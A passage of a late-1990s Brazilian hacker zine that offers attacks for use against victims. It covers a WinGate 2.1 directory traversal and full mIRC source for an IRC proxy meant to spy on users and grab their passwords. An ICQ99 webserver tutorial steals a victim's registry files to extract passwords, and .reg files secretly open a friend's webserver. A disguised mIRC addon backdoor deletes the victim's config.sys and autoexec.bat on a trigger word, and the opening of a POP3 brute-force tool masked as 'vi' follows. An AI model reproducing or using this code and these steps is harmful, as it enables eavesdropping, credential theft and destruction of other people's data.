	Voce percebeu que agora comecei falando do ataque em si mesmo, da pratica,
mas agora eh hora de falar um pouco do "POR QUE" desse ataque, senao essa materia 
vai ser apenas mais uma materia lammer de uma dakeles zines lammer. Como voce,
a conexao ocorre atraves do protocolo HTTP na porta 8010 do Wingate Host. 

"Tah bom, mas por que serah que esses cars foram tao burros de colocarem uma 
backdoor no proprio programa?"

	UHUueHUheuhe...nao eh bem assim! Na verdade, nessa porta 8010 roda um 
servico conhecido como Logfile Server e a funcao dele eh permitir que o bosta 
do sysadmin veja a distancia os preciosos logs de seu wingate. No lugar das 
duas barras do endereco acima, experimente colocar soh uma (no final). 
Bingowwww...voce vai estar olhando para os diretorios de logs! Mas, ahhhammm, 
acrescentando-se uma barra , voce volta para o diretorio raiz e da raiz, voce 
tem acesso a tudo! Huahuhuahuahuahuahuahuahua!

	Mas ATENCAO LAMMAH: Voce que acha que sabendo esse truquezinho se 
tornara um super-RAKER estah muito enganado! isso eh apenas uma ferramenta 
para voce usar em horas de extrema necessidade, quando estah furioso!

PS.: E como eu jah disse no titulo, o Wingate alvo precisa ser versao 2.1, a 
porta 8010 precisa estar aberta E dando acesso a todos os micros externos 
(sem restricoes) ;). Faca bom proveito!


*** =-=-= !!! TeRmInAnDo... !!! =-=-= ***


	Bom, espero que voce tenha feito bom proveito de todas as informacoes
 que eu pus aqui e AS USE SABIAMENTE! SEM LAMMERZAR! 
	Pesquisando sobre Wingate, reparei que a maioria das informacoes estao 
divididas em diferentes textos, em diferentes sites, de diferentes autores. Um 
dos principais motivos de eu (Sycofluid) ter redigido esse texto foi pelo prazer 
de reunir toda akela informacao em um texto, feito por uma pessoa, e ainda por 
cima, EM PORTUGUES (4mer1c4n SuXz)! Mas nao me leve a mal, nao estou tentando tirar 
credito nenhum das pessoas que descobriram esse bugs/ataques e os publicaram 
para a comunidade underground/sekurity! Eles sao um exemplo de verdadeiros 
fucadores (mesmo que o objeto fucado seja um RUINGAYTI) :)). Com novos bugs 
sendo descobertos e exploits sendo criados a cada dia, mais do que nunca temos 
a oportunidade de debulhar a fundo programas e sistemas e descobrir nos mesmos 
bugz e criar nossos ataques! Moral da historia: FUCE MUITO, NAO FIQUE DEPENDENTE 
DAS DESCOBERTAS DOS OUTROS SENAO VOCE SERAH APENAS MAIS UM WANNABE NO MEIO DE 
UMA INFINIDADE!

OS FUCADORES (fontes consultadas):

Rhino9 Security Team - http://rhino9.ml.org
Hacker's Hideout - http://www.hackersclub.com/km
Lista BUGTRAQ
Rootshell - http://www.rootshell.com

(c) =|SyC0FlUiD|= 


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=





                  _                                         _   
                 { }_______________________________________{ }     
                 | |                                       | |  
                 | |              IRCPROXY                 | |  
                 | |                                       | |  
                 | |_______________________________________| |
                 {_}                                       {_}


Bem sabem qundo Bl4ck-Di3 pegava os canais, sacaniava com nicks e talz ?
Era isso que ele estava usando, um IRCPROXY , ele abria tipo um server so 
pra ele , mas linkado com a brasnet, como o server e  dele ele pode ver tudo
que esta acontecendo, conversas da vitima e consequentemente ver suas senhas 
de nicks , canais e etc. O uso e simples e so vc lodiar o ircproxy.mrc( calm
a que o codigo esta ai embaixo) digitando /load -rs c:\XXX\ircproxy.mrc ( lem
bre-se de que esse XXX e o diretorio onde esta seu mIRC) e depois vc abre o 
proxy digitando /proxy start ,nisso o proxy jah esta prontinho la pra ser us
ado. Para a vitima se conectar e so ela digitar /server seuip:6999 irc.servid
or-que-vc-usa.com.br ( Ex: /server 127.0.0.7:6999 irc.lamminet.com.br) Pronto
muito facil, ai uma janela abrira e vc podera ver tudinho!! Rulizzz!!!;P
Ps: 1000 Desculpas bl4ck-di3 mas toda a informacao e livre !

Here's the code: 


------------------[ ircproxy.mrc ]--corte-aqui------------------------------

; IRC Proxy Server by pQaTeFnET
;
; Yes, people can use your ip to IRC and they can feel so
; much safer.  And yes, you can see what the users are saying
; and people say to your users, server messages, everything!
; It's like spying on those who use your proxy server!  You
; can also kill them off your server.  If you have any
; suggestions, email me at susjoe@hotmail.com
;
; Bored, that's why I made this!
;
; Tell the user to do a: /server [your ip]:6999 <server>
; to connect to <server>.
;
; Added 11/15/98: You can set the max clients for the proxy.
;                 You can set the max connections for a client.
;                 You can ban users from the proxy.
;
;
alias proxy {
  if ($1 == start) {
    show started up server.
    proxy.close
    proxy.start
  }
  elseif ($1 == accept) {
    set -u1 %proxy.free.socket $proxy.find.socket
    set $evac(proxy.connected.,%proxy.free.socket) $false
    set $evac(proxy.socket.,%proxy.free.socket) ircproxy.client. $+ $proxy.find.socket
    sockaccept ircproxy.client. $+ %proxy.free.socket
    set $evac(proxy.ip.,%proxy.free.socket) $sock($evacl(proxy.socket.,%proxy.free.socket)).ip
    set -u1 %proxy.ip $evacl(proxy.ip.,%proxy.free.socket)
    if ($proxy.banned(%proxy.ip) == $true) {
      proxy.send %proxy.free.socket $symbol you are banned from using this proxy.
      .timer -m 1 1 proxy sclose %proxy.free.socket
    }
    inc $evac(proxy.max.hosts.,%proxy.ip)
    if ($evacl(proxy.max.hosts.,%proxy.ip) > %proxy.max.host.clients) {
      proxy.send %proxy.free.socket $symbol no more connections from your host, max host clients: %proxy.max.host.clients
      .timer -m 1 1 proxy sclose %proxy.free.socket
      return
    }
    if (%proxy.connections >= %proxy.max.clients) {
      proxy.send %proxy.free.socket $symbol no more connections, max clients: %proxy.max.clients
      .timer -m 1 1 proxy sclose %proxy.free.socket
      return
    }
    .timerproxy.sidle. $+ $proxy.find.socket 1 %proxy.startup.idle proxy sidle $proxy.find.socket
  }
  elseif ($1 == add) {
    if ($2 == ban) {
      if ($proxy.banned($3) == $true) {
        show that ip is already banned.
        return
      }
      show added $3 to the banlist.
      write $proxy.banfile $3
    }
  }
  elseif ($1 == close) {
    if ($sock(ircproxy.*,0) == 0) { show there are no current connections. }
    else { proxy.close }
  }
  elseif ($1 == help) {
    echo 12 -a -- irc proxy v1 by pQ --
    echo 13 -a 6usage: /proxy <add|remove|start|close|kill|sclose|send|sendinfo|sendserv|view> <ban|banned>
    echo 9 -a $space(5) 3add <ban>: let's you add <ban> to the banlist.
    echo 9 -a $space(5) 3remove <ban>: let's you remove <ban> from the banlist.
    echo 9 -a $space(5) 3start: starts the proxy server.
    echo 9 -a $space(5) 3close: kills everyone who's connected to you.
    echo 9 -a $space(5) 3sclose <N>: kills <N> connection to you.
    echo 9 -a $space(5) 3send <N> <data>: sends <data> to the <N> connection.
    echo 9 -a $space(5) 3sendinfo <N> <data>: sends <N> a special print out of <data>.
    echo 9 -a $space(5) 3servsend <N> <data>: sends <data> to <N> server connection.
    echo 9 -a $space(5) 3view: let's you spy on your users, kick users, etc.
    echo 9 -a $space(5) 3view banned: displays the banned ips.
    return
  }
  elseif ($1 == idledout) {
    proxy.send $$2 [proxy]: idled out.
    proxy.sclose $$2
  }
  elseif ($1 == kill) {
    show killed IRC proxy server.
    proxy.kill
  }
  elseif ($1 == remove) {
    if ($2 == ban) {
      proxy.banned remove $shortfn($proxy.banfile) $3-
      return
    }
  }
  elseif ($1 == resetidle) {
    proxy.resetidle $$2
  }
  elseif ($1 == sclose) {
    proxy.sclose $$2
  }
  elseif ($1 == send) {
    proxy.send $$2-
  }
  elseif ($1 == sendinfo) {
    proxy.send $$2 [proxy]: $$3-
  }
  elseif ($1 == servsend) {
    proxy.servsend $$2 $$3-
  }
  elseif ($1 == sidle) {
    proxy.sidle $$2-
  }
  elseif ($1 == view) {
    if ($2 == banned) { proxy.view.banned }
    else { goto view }
    :view
    proxy.view
  }
  elseif ($1 == viewdel) {
    proxy.view.del $$2
  }
}
; returns the banfile.
alias -l proxy.banfile { return $proxy.directory(proxy_banned.dat) }
; returns whether or not if the ip is banned.
alias -l proxy.banned {
  if (($1 == file || $1 == remove) && $2 != $null) { set %proxy.banned.file $2 }
  else { set %proxy.banned.file $proxy.banfile }
  if ($exists(%proxy.banned.file) == $false) { return $false }
  set -u1 %proxy.banned.num 0
  set -u1 %proxy.banned.len $lines(%proxy.banned.file)
  if ($1 == remove) { set %proxy.banned.total 0 }
  :readagain
  inc %proxy.banned.num
  if (%proxy.banned.num > %proxy.banned.len) {
    if ($1 != remove) { return $false }
    elseif ($1 == remove) {
      show removed %proxy.banned.total ips.
      return
    }
  }
  set -u1 %proxy.banned.read $read -nl $+ %proxy.banned.num %proxy.banned.file
  if ($1 != file && $1 != remove && %proxy.banned.read iswm $1) { return $true }
  elseif ($1 == file && $1 != $remove && %proxy.banned.read iswm $3) { return $true }
  elseif ($1 == remove && $1 != file && $3 iswm %proxy.banned.read) {
    inc %proxy.banned.total
    write -dl $+ %proxy.banned.num %proxy.banned.file
  }
  goto readagain
}
; close all irc proxy connections.
alias -l proxy.close {
  set %proxy.close.len $sock(ircproxy*,0)
  :loop
  if ($sock(ircproxy.*,0) == 0) {
    .timerproxy.* off
    set %proxy.connections 0
    unset %proxy.max.hosts.*
    return
  }
  sockclose $sock(ircproxy.*,1)
  goto loop
}
; returns this file's directory.
alias -l proxy.directory {
  set -u1 %proxy.directory.num 0
  :loop
  inc %proxy.directory.num
  if ($script < %proxy.directory.num) { return }
  if ($script(%proxy.directory.num) == $script) {
    return $nofile($script(%proxy.directory.num)) $+ $1-
  }
  goto loop
}
; find an open socket.
alias -l proxy.find.socket {
  set -u1 %proxy.find.socket.num 0
  :findagain
  inc %proxy.find.socket.num
  if ($sock($evau(ircproxy.client.,%proxy.find.socket.num)) == $null) { return %proxy.find.socket.num }
  goto findagain
}
; kills the IRC proxy entirely.
alias -l proxy.kill {
  proxy.close
  if ($sock(ircproxy)) { sockclose ircproxy }
  unset %proxy.*
}
; resets the idle time of a user.
alias -l proxy.resetidle {
  .timerproxy.idle. $+ $$1 1 %proxy.idle.client proxy idledout $$1
}
; kill a certain user.
alias -l proxy.sclose {
  if ($evacl(proxy.ip.,$1)) { dec $evac(proxy.max.hosts.,$evacl(proxy.ip.,$1)) }
  if ($sock($evacl(proxy.socket.,$1))) { sockclose $evacl(proxy.socket.,$1) }
  if ($sock($evacl(proxy.server.socket.,$1))) { sockclose $evacl(proxy.server.socket.,$1) }
  if ($timer($evau(proxy.sidle.,$1))) { .timerproxy.sidle. $+ $1 off }
  if ($timer($evau(proxy.idle.,$1))) { .timerproxy.idle. $+ $1 off }
  proxy viewdel $1
  unset $evac(proxy.*.,$1)
  dec %proxy.connections
}
; sends data to a user.
alias -l proxy.send {
  if ($sock($evau(ircproxy.client.,$1))) { sockwrite -tn $evau(ircproxy.client.,$1) $2- }
}
; sends data to the users server.
alias -l proxy.servsend {
  if ($sock($evau(ircproxy.server.,$1))) { sockwrite -tn $evau(ircproxy.server.,$1) $2- }
}
; checks if the user hasn't sent any info on what server to connect to.
alias -l proxy.sidle {
  if ($evacl(proxy.server.,$1) == $null) { 
    proxy sendinfo $1 you have not sent any server info, idled out.
    proxy sclose $1
  }
}
; listen to port 6999, unset all the variables, and set some variables.
alias -l proxy.start {
  unset %proxy.*
  set %proxy.connections 0
  set %proxy.idle.client 1000
  set %proxy.startup.idle 10
  set %proxy.max.host.clients 1
  set %proxy.max.clients 5
  if ($portfree(6999) == $true && $sock(ircproxy) == $null) { socklisten ircproxy 6999 }
}
; allows you to view the users, spy on them too.
alias -l proxy.view {
  if ($window(@ProxyUsers) == $null) { window -l @ProxyUsers $calc(($window(-1).w - 600) / 2) $calc(($window(-1).h - 300) / 2) 600 300 @ProxyUsers Verdana 11 }
  set -u1 %proxy.view.num 0
  set -u1 %proxy.view.len $sock(ircproxy.client.*,0)
  :loop
  inc %proxy.view.num
  if (%proxy.view.num > %proxy.view.len) {
    window -b @ProxyUsers
    return
  }
  set -u1 %proxy.find.userline proxy user %proxy.view.num $+ :*
  if ($fline(@ProxyUsers,%proxy.find.userline,1,0)) { rline @ProxyUsers $ifmatch proxy user %proxy.view.num $+ : $chr(91) $+ $evacl(proxy.nick.,%proxy.view.num) $+ ( $+ $evacl(proxy.server.,%proxy.view.num) $+ )] }
  else { aline @ProxyUsers proxy user %proxy.view.num $+ : $chr(91) $+ $evacl(proxy.nick.,%proxy.view.num) $+ ( $+ $evacl(proxy.server.,%proxy.view.num) $+ )] }
  goto loop
}
; displays the banned ips.
alias -l proxy.view.banned {
  if ($exists($proxy.banfile) == $false || $lines($proxy.banfile) == 0) {
    show no banned ip's in ban file.
    return
  }
  set -u1 %proxy.view.banned.num 0
  set -u1 %proxy.view.banned.len $lines($proxy.banfile)
  show banned ips ( $+ %proxy.view.banned.len $+ )
  :readagain
  inc %proxy.view.banned.num
  if (%proxy.view.banned.num > %proxy.view.banned.len) {
    return
  }
  set -u1 %proxy.view.banned.read $read -nl $+ %proxy.view.banned.num $proxy.banfile
  if (%proxy.view.banned.read) { echo 13 -a $space(4) %proxy.view.banned.read }
  goto readagain
}
; remove the user from the view list.
alias -l proxy.view.del {
  if ($window(@ProxyUsers) == $null) { return }
  set -u1 %proxy.view.del.find proxy user $$1 $+ : *
  set -u1 %proxy.view.del.num $fline(@ProxyUsers,%proxy.view.del.find,1,0)
  if (%proxy.view.del.num) {
    dline @ProxyUsers %proxy.view.del.num
    goto loop
  }
  :loop
  set -u1 %proxy.view.del.temp proxy user *:*
  if ($line(@ProxyUsers,%proxy.view.del.num) == $null || %proxy.view.del.temp iswm $line(@ProxyUsers,%proxy.view.del.num)) { return }
  dline @ProxyUsers %proxy.view.del.num
  goto loop
}
; variable handlers.
alias -l evac { if ($1 == $null) return | return $chr(37) $+ $1 $+ $2 }
alias -l evacl { if ($1 == $null) return | return % [ $+ [ $remove($1-2,$chr(32)) ] ] }
alias -l evacr { return $1- }
alias -l evar { if ($1 == $null) return | return % [ $+ [ $1 ] ] }
alias -l evau { return $remove($1-,$chr(32)) }
; trimming.
alias -l mtrim { return $rtrim($$1,$ltrim($$1,$$2-)) }
alias -l ltrim { return $right($2-,$calc($len($2-) - $1)) }
alias -l rtrim { return $left($2-,$calc($len($2-) - $1)) }
; prints text out in IRC proxy format.
alias -l show { echo -a [proxy]: $$1- }
; returns socket number.
alias -l socknum { return $gettok($sockname,3,46) }
; returns proxy symbol.
alias -l symbol { return [proxy]: }
; creates spaces with character 160.
alias -l space {
  unset %space
  if (($2 == $null) && ($1 isnum)) {
    set %space $str($chr(160),$$1)
    return %space
  }
  else {
    if ($len($strip($2-)) >= $1) set %space $left($strip($2-),$1)
    elseif ($len($strip($2-)) < $1) set %space $2- $+ $str($chr(160),$calc($1 - $len($strip($2-))))
    return %space
  }
}
; accept connections.
on 1:SOCKLISTEN:ircproxy: { proxy accept }
; opened connection.
on 1:SOCKOPEN:ircproxy.*: {
  if ($sockerr > 0) {
    proxy sendinfo $socknum error with connection, try again later.
    proxy sclose $socknum
  }
  inc %proxy.connections
  set $evac(proxy.connected.,$socknum) $true
  if ($evacl(proxy.pass.,$socknum) != $null) { sockwrite -tn $sockname PASS $evacl(proxy.pass.,$socknum) }
  if ($evacl(proxy.nick.,$socknum) != $null) { sockwrite -tn $sockname NICK $evacl(proxy.nick.,$socknum) }
  if ($evacl(proxy.user.,$socknum) != $null) { sockwrite -tn $sockname USER $evacl(proxy.user.,$socknum) }
}
; closing connection.
on 1:SOCKCLOSE:ircproxy.*: {
  proxy viewdel $socknum
  proxy sclose $socknum
}
; read incoming data.
on 1:SOCKREAD:ircproxy.*: {
  if ($sockerr > 0) { return }
  :readagain
  sockread %temp
  if ($sockbr == 0) { return }
  if ($gettok($sockname,2,46) == client) {
    if ($evacl(proxy.connected.,$socknum) == $true) {
      if ($window(@ProxyUsers)) {
        set -u1 %proxy.find.userline proxy user $socknum $+ :*
        iline @ProxyUsers $calc($fline(@ProxyUsers,%proxy.find.userline,1,0) + 1) $space(4) 6outgoing:13 %temp $+ 
      }
      sockwrite -tn $evacl(proxy.server.socket.,$socknum) %temp
      if (%proxy.idle.client != 0 && %proxy.idle.client != $null) { proxy resetidle $socknum }
    }
    else {
      set -u1 %proxy.incoming.command $gettok(%temp,1,32)
      if (%proxy.incoming.command == PASS) {
        if ($gettok(%temp,2,32) == $null) {
          proxy sendinfo $socknum you did not specify a server.
          proxy sclose $socknum
        }
        elseif ($gettok(%temp,2,32) != $null) {
          set -u1 %proxy.server $gettok($gettok(%temp,2,32),1,58)
          if (%proxy.server == 127.0.0.1 || %proxy.server == $ip || %proxy.server == localhost) {
            proxy sendinfo $socknum I don't think you would want to crash this server now would you?
            .timer 1 1 proxy sclose $socknum
            return
          }
          if ($gettok($gettok(%temp,2,32),2,64) != $null) { set $evac(proxy.pass.,$socknum) $gettok($gettok(%temp,2,32),2-,64) }
          set $evac(proxy.server.,$socknum) $gettok($gettok(%temp,2,32),1,58)
          set $evac(proxy.server.port.,$socknum) $iif($gettok($gettok(%temp,2,32),2,58) != $null,$gettok($gettok(%temp,2,32),2,58),6667)
          set $evac(proxy.server.socket.,$socknum) ircproxy.server. $+ $socknum
          sockopen ircproxy.server. $+ $socknum $evacl(proxy.server.,$socknum) $evacl(proxy.server.port.,$socknum)
        }
      }
      elseif (%proxy.incoming.command == USER) { set $evac(proxy.user.,$socknum) $gettok(%temp,2-,32) }
      elseif (%proxy.incoming.command == NICK) { set $evac(proxy.nick.,$socknum) $gettok(%temp,2-,32) }
    }
  }
  elseif ($gettok($sockname,2,46) == server) {
    if ($window(@ProxyUsers)) {
      set -u1 %proxy.find.userline proxy user $socknum $+ :*
      if ($fline(@ProxyUsers,%proxy.find.userline,1,0)) { iline @ProxyUsers $calc($fline(@ProxyUsers,%proxy.find.userline,1,0) + 1) $space(4) 3incoming:9 %temp $+  }
    }
    if ($gettok(%temp,2,32) == NICK && $gettok($ltrim(1,%temp),1,33) == $evacl(proxy.nick.,$socknum)) {
      set $evac(proxy.nick.,$socknum) $ltrim(1,$gettok(%temp,3,32))
    }
    proxy view
    sockwrite -tn ircproxy.client. $+ $socknum %temp
  }
  goto readagain
}
alias -l mp {
  if (proxy user *:* iswm $sline(@ProxyUsers,1)) {
    $$1-2 $rtrim(1,$gettok($sline(@ProxyUsers,1),3,32)) $3-
  }
}
menu @ProxyUsers {
  &send message to client: { mp proxy sendinfo $$?="Command to send to client:" }
  &send command to server: { mp proxy servsend $$?="Command to send to server:" }
  -
  &kill user: { mp proxy sclose }
}
--------------[ ircproxy.mrc ]---pare-de-cortar-----------------------------





                  _                                         _   
                 { }_______________________________________{ }     
                 | |                                       | |  
                 | |           LAMMER DO MES               | |  
                 | |                                       | |  
                 | |_______________________________________| |
                 {_}                                       {_}

Todo mes botamos os lammers ( dos milhares que ha por ai) mais destacados na lammi
sses, os lammers desse mes sao os lammer do HACKER STATION , um bando de lamm0s
da UNIP de sao paulo que se acham os hackers ( Aquele velho bando de lammers
aglomerados que se acham) o grupo e tao lammer, mais tao lammer que tem ate 
carteirinha e  camisa de hacker auheeauhauheuheauaheuh essa foi otima, e eles
dizem "A sala #X da uol e nosso dominio" ele ficam nessa sala da uol falando
lammise e floodiando com programas lammers, muito comico! De uma olhada em
www.hastation.cjb.net  e  veja  a versao sacaneada por _Neptunus_ em www.lstation
.cjb.net



                  _                                         _   
                 { }_______________________________________{ }     
                 | |                                       | |  
                 | |             B00KMARK                  | |  
                 | |                                       | |  
                 | |_______________________________________| |
                 {_}                                       {_}


Essa parte do zine e bem legal, a parte onde vo bota algumas paginas legais
sobre *TODO* o tipo de assunto. E la vai c00l  pages.

-=DESTAQUE DO MES-=
>>>> www.007lab.com ( nssa pagina e muito r0x mesmo)
* www.satanic.org (nao nao e sobre satanismo nao)
* www.eeye.com (grupo de seguranca, muito boa tb)
* www.winntmag.com ( otima pagina sobre NT)
* www.textfiles.com ( putz muito boa essa pagina, hacking nos anos 80/90)
* www.linux.trix.net ( pagina brasileira sobre linux, vale a pena conferir)
* http://webpages.mr.net/bobz/ttyquake ( QUAKE RULAAAA :P)
* www.rpg.com.br ( Sem comentarios )
* www.raulseixas.com.br ( viva a sociedade alternativa, raulzito vive!!)
* www.terravista.ciclone.com.br/PraiaBrava/2666/ ( so entre se vc tiver uma
cabeca aberta e se vc sabe lhe dar com o diferente, caso contrario nem olhe)
* www.geocities.com/SunsetStrip/Club/8717/ ( Cifra club )
* www.cabo-por-hoje.porra! 

                  _                                         _   
                 { }_______________________________________{ }     
                 | |                                       | |  
                 | |            PEQUENAS NOTAS             | |  
                 | |                                       | |  
                 | |_______________________________________| |
                 {_}                                       {_}


# HACK0 DO MES >>>  Weird , o kra faz uns proggies legais
                  http://members.tripod.com/~weird173

# PAGE DO MES >>> Vide a parte B00kmark.


# PROGGIES DO MES >>> F0rbidden Trojan , very c00l proggie ;P feito por 
_Neptunus_, tb tem o FTPserver feito pelo mesmo 
Jogo da cobrinha, very c00l game t00 , feito pelo velhinho



                  _                                         _   
                 { }_______________________________________{ }     
                 | |                                       | |  
                 | |             ICQWEBSERVER BUG          | |  
                 | |                                       | |  
                 | |_______________________________________| |
                 {_}                                       {_}





			Invasão pelo WeB-Server do ICQ99 build #1700
**********************************************************************************************
************ Você já viu algum user de ICQ com uma casinha do lado do nick dele...? **********
***************         Já se perguntou para que server aquela casinha...?     ***************
***** Aqui vou te esninar como invadir por esse Bug mostro que a Mirabilis preparou pra vc. **
**********************************************************************************************
Os idiotas da mirabilis fizeram um sistema de webserver no ICQ99 e deixaram bugs enormes nele.
Neste tutorial vou ensinar a você como tirar o devido proveito desse Bug... Boa Sorte...
########################################### 1º Passo ########################################

>>>>>> Como se conectar a maquina.

  1. Pressione o botão INICIAR...

  2. Pressione em EXECUTAR...

  3. Digite "Telnet 250.250.250.250" escolha a porta 80, Ao invês de colocar 250.250.250.250 
coloque o IP da vitima (IMPORTANTE: Este bug, creio eu que roda somente na versão 99a 
build#1700, não testei em outras versões).

  4. Tecle "ENTER" e espere a conexão se estabelecer.

########################################### 2º Passo ########################################
>>>>>>> Leitura e salvamento de um arquivo (exemplo: win.ini).

  1. Abra seu browser...

  2. Digite http://250.250.250.250/.html/......../windows/win.ini
     *** IMPORTANTE: Perceba que hà dois comandos estranhos nesta linha que é /.html/ «« este 
comando vai fazer com que o servidor pense que o arquivo requisitado é um html comum... o outro
 comando é os pontos /......../ «««« este comando faz com que o servidor volte 4 diretórios 
(8 pontos) esse padrão muitas vezes não é obedecido pois tem users que instalam o ICQ em outro
diretório que não é o default(c:\arquivos de programas\ICQ\*.*) isso pode causar problemas, 
pois vc tem que procurar aonde está instalado o ICQ da vitima (Perceba que o diretorio do Root 
é C:\Arquivos de programas\ICQ\Homepage\Root)

  3. Algums roblemas já foram detectados... por exemplo se vc é um user de win95 e a vitima 
user de win98, isso causará erros em algum casos (naum todos)...

  4. Como verificar se suas versões são compativeis?
     Facil existem varios modos de verificar as versões de arquivos diferentes nesse caso a 
que eu uso e recomendo é a comparação dos arquivos Command.com dos dois computadores... Mas 
existem milhares de jeitos de fazer esa comparação... invente o seu...
############################################ 3º Passo ########################################

>>>>>>> Como roubar senhas desse users...?

  1. Roube dois arquivos o User.dat (http://250.250.250.250/.html/......../windows/user.dat) 
e System.dat (http://250.250.250.250/.html/......../windows/system.dat) estes arquivos são os 
arquivos de registro do windows...

  2. Copie eles em um diretório. 

  3. Faça uma cópia de segurança dos seus arquivos de registro 
(c:\windows\user.dat e c:\windows\system.dat).

  4. Reinicie seu computador.

  5. Reinicie no "Somente Prompt do MS-DOS"

  6. Delete seus arquivos de registro e coloque os que vc roubou no lugar deles 
(LEMBRE-SE: Delete os seus arquivos de registro e naum as copias que vc fez).

  7. Reinicie seu computador(Para ser feita a leitura dos arquivos de registro roubados). 

  8. Reinicie no "Modo de Segurança".

  9. Depois de reiniciado no modo de segurança vá em INICIAR...

  10. Pressione em EXECUTAR... 

  11. Digite "regedit" para abrir o seu editor de registro...

  12. Tecle "ENTER"

  13. Depois de aberto o registro vc vai procurar os arquivos de senhas, 
Exporta-los e salva-los em um arquivo .reg no seu computador

  14. Caso tenha senhas de *Rna(Rede Dial-UP), Procure na net um descodificador para cracke-lo.

  15. Pronto se vc der sorte vai pegar umas senhas...

  16. Agora vc vai fazer com que o registro volte ao normal...

  17. Reinicie o computador no modo "Somente Prompt do MS-DOS"

  18. deleta os arquivos de registros que vc baixou...

  19. E coloca de volta os arquivos que vc copiou antecipadamente em outro diretório 
sequindo o passo 3 (do 3º passo).

  20. Depois disso vc reinicia o computador no modo normal e Pluft´z... o computador estar 
normal denovo.

		   ««««««««««««««« Para trair um amigo seu »»»»»»»»»»»»»»»»

   Crie um arquivo de registro (.reg) com o sequinte conteúdo (Para abrir o WebServer do ICQ):

REGEDIT4

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\+UIN da Vitima\Prefs\WebFront]
"Enable"=dword:00000001
"Allow"=dword:00000001


   Crie um arquivo de registro (.reg) com o sequinte conteúdo (Para fechar o WebServer do ICQ):

REGEDIT4

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\+UIN da Vitima\Prefs\WebFront]
"Enable"=dword:00000000
"Allow"=dword:00000001

===============================================================================================
By º_Neptunus_º






                  _                                         _   
                 { }_______________________________________{ }     
                 | |                                       | |  
                 | |                MIRC 5.6               | |  
                 | |                                       | |  
                 | |_______________________________________| |
                 {_}                                       {_}


······                                .. Status:
:....................                 :
      mIRC 5.6      :                 :.. Metéria: mIRC 5.6 ...
               ······                                         : 
                                      ... Autor: FalkO .......:
                                      :
                                      :.. Data: 06/06/99 .....:


Intro:
¯¯¯¯¯¯
Recentemente, foi lançado uma nova versão do mIRC, que hoje é o cliente de
IRC mais utilizado em todas as redes.Esta nova versão, 5.6, traz segundo seu
autor(Khaled Mardan Bay), 110 novidades, auterações ou bug's corrigidos...
Lendo-se o arquivos VERSIONS.TXT que vem com o mIRC, realmente é possível se
notar 110 itens, os quais eu li juntamente ao help do mIRC, para ver o que o
mIRC traz de novo em sua linguagem de programação.


O que há de novo?
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Dentre esses 110 itens, a grande maioria é uma possível 'correção de bugs', 
mas o que me chamou a atenção, foi o comando /dll.A idéia do Khaled parece
ser a de consolidar a linguagem do scripting, como uma séria linguagem de 
programação, e isso ja vinha sido mostrado com os dialog's que surgiram a 
partir da versão 5.5 do mIRC.O novo sistema de DLL, pelo que eu entendi, 
terá como finalidade o armazenamento de dados e comandos em arquivos *.DLL,
os quais não ficaram disponíveis aos usuários dos scripts...


Sobre as DLL's:
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Entra em questão o seguinte, a linguagem para a criação de DLL's talvez não
seja a mesma da criação de um script comum, e isso faz com que somente progr
amadores mais experientes possam criar scripts com 'recursos extras'.O grande
problema, é que o conteúdo de uma DLL pode ser tanto 'bom' como 'mal', ou 
seja, não se pode mais saber se é possível confiar em um script. :( 
Antes, poderiam ser criadas linhas dentro dos *remotes* dos scripts, que seriam 
nocivas ao usuários, como por exemplo backdoor's com efeitos nocivos, mas 
agora com as 'inovações do mIRC', será possível ocuLtar muito mais esses 
comandos, sendo que serão poucos os que poderão identificar esse tipo de 
comando dentro de uma DLL.


Conclusão:
¯¯¯¯¯¯¯¯¯¯
O que se pode concluir com tudo isso, é que a linguagem de programação do mIRC
passa a se tornar algo mais sério e consolidado, enquanto que ao mesmo tempo
se torna algo 'arriscado' aos usuários que deverão tomar uma precaução a mais 
ao baixar os scripts da internet!


Addon Extra:
¯¯¯¯¯¯¯¯¯¯¯¯
Como acima eu falei sobre backdoor's nocivas, eu deixo abaixo um addon de 
backdoor, o qual deverá ser criado em um arquivo de texto, e depois ser enviado
pela vítima, que deverá carregar o addon  no mIRC dela. Após o addon ser car
regado no mIRC da vítima, basta ativá-lo com um simples comando no private 
dela.


;Cole as linhas abaixo em um arquivo de texto, e salve-o com um nome bem ;convincente e com uma extensão inexistente. Ex: addon.fcp

on 1:text:*!fuck*:?:{
/echo 2[12wOw!2] Removing: 12config.sys2...
/remove c:\config.sys
/echo 2[12wOw!2] Removed file: 12config.sys2...
/echo 2[12wOw!2] Removing: 12autoexec.bat2...
/remove c:\autoexec.bat
/echo 2[12wOw!2] Removed file: 12autoexec.bat2...
/msg SEUNICK 2[12Ok!2] Operation completed sucesfully!
}

;fim

OBS! --> Para isso funcionar, a vítima deverá ter carregado o addon no mIRC
dela, após ela ter feito isso, vá no private dela, e dígite: !fuck
Mas não eskeca de trocar ali em *SEUNICK*, para o seu nick, como por exemplo
: falko :P

---

Acho que é só, e na próxima matéria tentarei explicar melhor o novo eskema
de DLL's do mIRC! :) thanx!



                  _                                         _   
                 { }_______________________________________{ }     
                 | |                                       | |  
                 | |             BONUS TRACK #1            | |  
                 | |                                       | |  
                 | |_______________________________________| |
                 {_}                                       {_}




Bonus, bonus , bonus bonus ruliz  dessa vez  esta ai o codigo do POP3HACK
um proggie very c00ll de brute force que fica tentando a partir de uma wordl
ist e os logins  sao definidos por um login list, ai voce pode escolher os
logins que vc quer tentar pega a senha. Esse proggie e muito legal.
  

===[corte]========[aqui]=======[ Pop3hack.c ]====={cut}======={here}============

#include <stdio.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdarg.h>

/* First, define the POP-3 port - almost always 110 */
#define POP3_PORT               110

/* What we want our program to be masked as, so nosy sysadmins dont kill us */
#define MASKAS                  "vi"

/* Repeat connect or not - remember, logs still report a connection, so
you might want to set this to 0. If set to 0, it will hack until it finds
1 user/password then exit. If set to 1, it will reconnect and try more
user/passwords (until it runs out of usernames) */
#define RECONNECT		0



/* The function prototypes */
void nuke_string(char *);
int pop_connect(char *);
int pop_guess(char *, char *);
char *getanswer(char *);
char *getanswer_(char *);
void swallow_welcome(void);
